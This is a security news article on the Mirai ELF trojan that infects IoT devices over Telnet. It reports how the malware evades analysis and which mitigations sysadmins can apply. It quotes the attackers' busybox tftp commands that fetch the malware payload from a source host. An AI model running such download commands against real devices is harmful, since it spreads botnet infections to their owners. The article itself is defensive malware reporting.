Linux/Mirai ELF, when malware is recycled could be still dangerous

Pierluigi Paganini September 05, 2016

Experts from MalwareMustDie spotted a new ELF trojan backdoor, dubbed ELF Linux/Mirai,  which is now targeting IoT devices.

Experts from MalwareMustDie have analyzed in August samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai,  which is now targeting IoT devices. The name of the malware is the same of the binary,”mirai.*,” and according to the experts, several attacks have been detected in the wild.

The ELF Linux/Mirai is very insidious; it is still undetected by many antivirus solutions as confirmed by the very low detection ratio in the VirusTotal online scanning service.

“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming.” states the analysis from MalwareMustDie Blog.

The last ELF examined by Security Affairs was the Linux Trojan Linux.PNScan that has actively targeting routers based on x86 Linux in an attempt to install backdoors on them.

But MalwareMustDie tells us that Linux/Mirai “is a lot bigger than PnScan”.

And continues: “The threat was starting campaign in early August even if this ELF is not easy to be detected since it is not showing its activity soon after being installed: it sits in there and during that time, no malware file will be left over in system, all are deleted except the delayed process where the malware is running after being executed.”

This means that when the infections succeeded, it is not easy to distinguish an infected system by a not infected one, except than from the memory analysis, and we are talking about a kind of devices that are not easy to analyze and debug. The normal kind of analysis conducted from the file system or from the external network traffic doesn’t give any evidence, at the beginning.

We are in a hostile environment, called Internet of Things (IoT), shaping new kind of powerful Botnets spreading worldwide, but which Countries are more exposed to this kind of attack?

“Countries that are having Linux busybox IoT embedded devices that can connect to the internet, like DVR or Web IP Camera from several brands, and countries who have ISP serving users by Linux routers running with global IP address, are exposed as target, especially to the devices or services that is not securing the access for the telnet port (Tcp/23) service

In fact seems that he continues, “the Linux/Mirai creators succeed to encode the strings and making diversion of traffic to camouflage themself. As is possible to see analyzing the samples, shown in the link to Virustotal  the best detection is only “3 of 53” or “3 to 55.

What is very important for all the sysadmins is to be provided by a shield against these infections: “along with the good friends involved in the open filtration system, security engineers are trying to push” – says again MalwareMustDie – “the correct filtration signature to alert the sysadmins if having the attacks from this threat. And on one pilot  a sysadmins provided with the correct signatures, found the source attack from several hundreds of addresses within only a couple of days.

Then it seems that the infection is really going widespread and the Botnet seems to be really very large.

At the moment for all the sysadmins who want to protect their systems there is a list of mitigations actions:

  • If you have an IoT device, please make sure you have no telnet service open and running.
  • Blocking the used TCP/48101 port if you don’t use it, it’s good to prevent infection & further damage,
  • Monitor the telnet connections because the Botnet protocol used for infection is the Telnet service,
  • Reverse the process looking for the strings reported in the MalwareMustDie detections tool tips.

But, what we know about this Linux/Mirai ELF malware exactly, and why it is not so common among the malware analysts?

The reason why not so many people know it”, says MalwareMustDie – “is that antivirus thinks it is a variant of Gafgyt or Bashlite or Bashdoor. Then, the real samples of this malware is hard to get since most malware analysts have to extract it from memory on an infected device, or maybe have to hack the CNC to fetch those.”

This means that also the forensic analysis can be difficult if we switch off the infected device: all the information would be lost and maybe it would be necessary start again with a new infection procedure, in case. It remembers the Greek mobile wiretap named “Vodafone Hack”, no evidence than in the memory.

But in your opinion which is the main difference among the previous ELF malware versions?

The actors are now having different strategy than older type of similar threat.” – says MalwareMustDie – “by trying to be stealth (with delay), undetected (low detection hit in AV or traffic filter), unseen (no trace nor samples extracted), encoded ELF’s ASCII data, and with a big “hush-hush” among them for its distribution. But it is obvious that the main purpose is still for DDoS botnet and to rapidly spread its infection to reachable IoTs by what they call it as Telnet Scanner. ”

The real insidiously of this ELF is that the only way to track it is to extract it from the memory of the running devices and there is not so much expertise among people that can “hack their own routers or webcam or DVR to get the malware binary dumped from the memory or checking the trace of infection.

Digging in the details: how the infection works.

Attackers hacked IoT devices via SSH or Telnet account exploiting known vulnerabilities or using default passwords that were not changed by the owner of the targeted systems.

DVR surveilance

As we read in the last post on the MalwareMustDie blog, this kind of ELF uses a specific technique to fork into a new process if the conditions of the infection of the current device are targeted, otherwise the node is safe and the installation does not go on.

Once gained a shell access on the device, the attackers will download the payload of the ELF Linux/Mirai malware, below an example of the command launched on an IoT device to perform the operation:

busybox tftp‘ -r [MalwareFile] -g [IPsource]
busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

It was very difficult to analyze the Linux/Mirai infection because once executed the malware is also able to delete traces of its presence.

“In some cases of the Linux/Mirai infection is showing traces that the malware was executed without parameter and there are cases where the downloaded malware file(s) is deleted after execution. In this case, mostly you won’t get the samples unless you dump the malware process to the ELF binary. This explains it is hard to get the good working samples for this new threat.” continues the MalwareMustDie team.

“Upon execution the malware will be self-deleted to avoid the trace, but the process is running. In some IoT that can be seen in lsof or the list to the /proc with specific PID, i.e.:”

/proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (deleted) 
/proc/{PID}/exe -> ‘./{long alphabet strings}’ (deleted)

While the process runs, the malware opens the PF_INET, a UNIX networking socket for TCP, and binds it to the port TCP/48101 from localhost IP address and then starting to listen to the incoming connection. The malware forks to a new process with a new process PID,  “the infected device will perform connection on telnet services on other devices for the further abuse purpose.

The experts also provided a way to reverse a running process with a tool that will go open-source: for the details, enjoy the analysis.

About the Author: Odisseus

Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration test and development.

[adrotate banner=”9″] [adrotate banner=”12″]

Co-Author Pierluigi Paganini

(Security Affairs – Linux Mirai malware, IoT)

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment